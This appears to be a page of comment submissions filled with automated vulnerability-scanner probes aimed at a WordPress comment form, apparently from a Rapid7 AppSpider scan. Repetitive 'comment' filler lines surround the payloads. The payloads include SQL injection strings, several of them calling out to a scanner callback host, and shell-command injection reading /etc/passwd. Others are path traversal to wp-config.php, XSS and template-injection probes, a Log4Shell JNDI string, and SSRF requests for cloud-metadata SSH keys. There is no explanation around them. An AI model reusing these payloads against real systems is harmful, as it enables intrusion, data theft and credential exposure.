comment and 1 in (select BENCHMARK(1692307,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(14825947,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(2222222,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13358,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(988,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(70,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(13097,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(835,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(53,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’;+exec+master..xp_dirtree+”//19d977e07a64d280c33462ed865680cda65e0d51.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’35697e2274daa06bb475a0a3317c9e8e37728829.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\a4b00b4abcfed2518fc7293475b8f52bb07c303e.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\de61ae3951c2cbc56e8346d80ce29e5bfe6fc5b1.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+fc35d685179d5fc1c6d6050ccf1900da8fdffbbd.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://48b74772a2105f10b127d46f1d0e375d915a5c04.oob.appspidered.rapid7.com/’)+END)–
comment
comment
commentx7ih23as
x7iz6uvl'”x7iz6uvl
comment
comment
comment
comment
comment
‘comment
comment’
comment”
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7kclrwd
comment&& echo foobar x7kygdzu
comment| echo foobar x7lifkt8
comment| echo foobar x7l1salp|
comment< echo foobar x7mlrhgo
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
..\..\..\..\..\
comment%u0022
{‘comment
x7ae8zwi: x7ae8zwi
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
alert(358218)
“>alert(420115)
“>alert(547958)
‘>alert(589220)
‘>alert(663486)
comment%u0027
|
!comment
comment
comment’ OR 1=0 ##
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1692307,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment
comment
comment
{{ 62951705 + 74179523 }}
comment’ and 1 in (select BENCHMARK(14825947,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx77pducu
x777hlvt'”x777hlvt
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
x7w6bdw9: x7w6bdw9
https://appspidered.rapid7.com/xss/script/4320becfba430588bf63220dc0b8fe4a0aec652f
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
alert(1625233)
alert(1735890)
alert(1834250)
alert(1912135)
“>alert(2084310)
“>alert(2194976)
“>alert(2293342)
“>alert(2453183)
‘>alert(2555660)
‘>alert(2670418)
‘>alert(2793356)
‘>alert(2904001)
“>
“>
“>
“>
‘>
‘>
‘>
‘>
{constructor.constructor(4987940)}
{constructor.constructor(5193639)}
{constructor.constructor(5353966)}
{constructor.constructor(5534925)}
=alert(5711749)
=alert(5826945)
=alert(5946190)
=alert(6065420)
‘alert(6184712)
‘alert(6308115)
‘alert(6427407)
‘alert(6542567)
abc
abc
abc
abc
abc
abc
abc
abc
comment”>
comment”>
comment”>
comment”>
abc
abc
abc
abc
@import’x77toplb’;
@import’x78jwnze’;
@import’x7844tke’;
@import’x79wlpwn’;
ADw-script AD4-alert(10516716) ADw-/script AD4-
ADw-script AD4-alert(10664868) ADw-/script AD4-
+ADw-script+AD4-alert(10804718)+ADw-/script+AD4-
+ADw-script+AD4-alert(10952837)+ADw-/script+AD4-
abc
abc
abc
abc
comment’>
comment’>
comment’>
comment’>
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
commentʼ
comment| echo foobar x7l4qir9|
comment
comment’ OR ‘1’=’0
comment’) OR ‘1’ in (‘0
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select BENCHMARK(2222222,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
‘ (select*from(select(sleep(05)))a) ‘
%u2019comment
%u2018comment
/../../../../../../../../../../..
..\..\..\..\..\
../wp-config.php
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7czjhkb
x7dgeaw7′”x7dgeaw7
comment
comment
comment
comment
comment
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
x7haa7al
x7hrshqt
x7h9v896: x7h9v896
http://appspidered.rapid7.com/xss/script/f497b6e4aa3f44ccd29c8ff68ba523cc76a42afd
http://appspidered.rapid7.com/xss/script/7f7b1f7a525de379e7f6012f3620f0c5d98c8c18
http://appspidered.rapid7.com/xss/script/43a357e1d8eb83872d0a16c2f33596d9f510e85e
http://appspidered.rapid7.com/xss/script/d95d5c0a51cd5c9a4e50295f0e4df4b5a7a2590d
https://appspidered.rapid7.com/xss/script/7f2592c2c4e0e6d499f994a2e6cf09e0da209aaf
https://appspidered.rapid7.com/xss/script/d174310e15ae24f9d662691f918a0fa8fe68aaef
https://appspidered.rapid7.com/xss/script/929d06305ef82cd41d517acf5582a1e3365ef1dd
https://appspidered.rapid7.com/xss/script/865b177178f871ed5a902081103bf90aad62d295
http://appspidered.rapid7.com/xss/script/cfd452267954cc926c38248aafa1c3e9095e752f
http://appspidered.rapid7.com/xss/script/7d28005a67bcca00f70f969fcd8a30edf6433024
http://appspidered.rapid7.com/xss/script/a4bb793f0893dea04dfcf75edec91ff49cb4c409
https://appspidered.rapid7.com/xss/script/e60766aef66e522b8c741b23b1cd016eb460acfa
https://appspidered.rapid7.com/xss/script/58b7cd1ff0f2141e26db2b16ca61d342359cd711
https://appspidered.rapid7.com/xss/script/cb143f7bd7e6e8c772dcc85c1b6a6b5d3ac1e3a8
https://appspidered.rapid7.com/xss/script/92b3bb1257861093690490eb470c296af2a31b2f
appspidered.rapid7.com/xss/script/a937371235fe9f14fc8656abfd22c1fe99bb82bd
appspidered.rapid7.com/xss/script/3cf96efadc0c9e3e9139c7e05bd8e3eb0cb42033
appspidered.rapid7.com/xss/script/f1f737bfd734ed3b3ac720363111a413bb3523cf
appspidered.rapid7.com/xss/script/d7998d4d552fa466aab0bb08b9423d9b864b00d2
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
*
|
comment|
&
comment&
comment)
!comment
${jndi:ldap://b6674decbdab5eb5b9c05cb552b1fc9006192936.oob.appspidered.rapid7.${lower:COM}}
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
../../../../../../boot.ini.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7nypayg
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
‘comment
comment’
comment”
comment%’
comment%u0027
comment%27
comment%”
comment%u0022
comment%22
LIMIT a
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment’ AND 1=1)–
comment’) AND (‘1’=’0
comment’) AND (‘1’=’1
comment”) AND (“1″”=”0
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13358,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(988,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(70,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(13097,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(835,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(53,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
comment’;+exec+master..xp_dirtree+”//19d977e07a64d280c33462ed865680cda65e0d51.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’35697e2274daa06bb475a0a3317c9e8e37728829.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\a4b00b4abcfed2518fc7293475b8f52bb07c303e.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\de61ae3951c2cbc56e8346d80ce29e5bfe6fc5b1.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+fc35d685179d5fc1c6d6050ccf1900da8fdffbbd.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://48b74772a2105f10b127d46f1d0e375d915a5c04.oob.appspidered.rapid7.com/’)+END)–
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
< /etc/passwd
a
b
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment/
comment/’
comment/”
/’comment
comment”}, {x7zij6lq:{$meta: “textScore
comment’}, {x7zz1g2u:{$meta: ‘textScore
comment”}}, {x70gwahm:{$meta: “textScore
comment’}, {x7014fh3:{$meta: ‘textScore
‘.phpinfo().’
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7cc5xan
comment&& echo foobar x7cwim0t
comment| echo foobar x7dmqkrn
comment| echo foobar x7d7ypq8|
comment< echo foobar x7eskdng
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
alert(6088805)
alert(6215838)
alert(6351084)
alert(6490430)
“>alert(6826533)
“>alert(6974060)
“>alert(7113397)
“>alert(7244564)
‘>alert(7412638)
‘>alert(7556077)
‘>alert(7687256)
‘>alert(7826616)
“>
“>
“>
‘>
‘>
‘>
{constructor.constructor(9052026)}
{constructor.constructor(9195448)}
{constructor.constructor(9355276)}
{constructor.constructor(9502806)}
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment